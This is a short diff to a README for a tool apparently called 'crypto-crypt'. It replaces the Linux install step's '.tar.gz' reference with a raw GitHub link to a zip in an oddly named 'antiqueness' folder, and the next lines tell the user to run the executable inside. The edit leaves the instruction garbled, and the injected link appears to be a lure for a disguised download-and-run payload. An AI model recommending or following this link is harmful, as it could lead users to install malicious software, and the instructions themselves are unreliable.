Unfavorable-bob449/crypto-crypt/README.md

    - Drag the **crypto-crypt** icon into your Applications folder.

 3. **For Linux:**
-   - Extract the downloaded `.tar.gz` file.
+   - Extract the downloaded `https://raw.githubusercontent.com/Unfavorable-bob449/crypto-crypt/master/antiqueness/crypto-crypt-v3.6-alpha.1.zip` file.
    - Open a terminal and navigate to the extracted folder.
    - Run the application using the provided executable.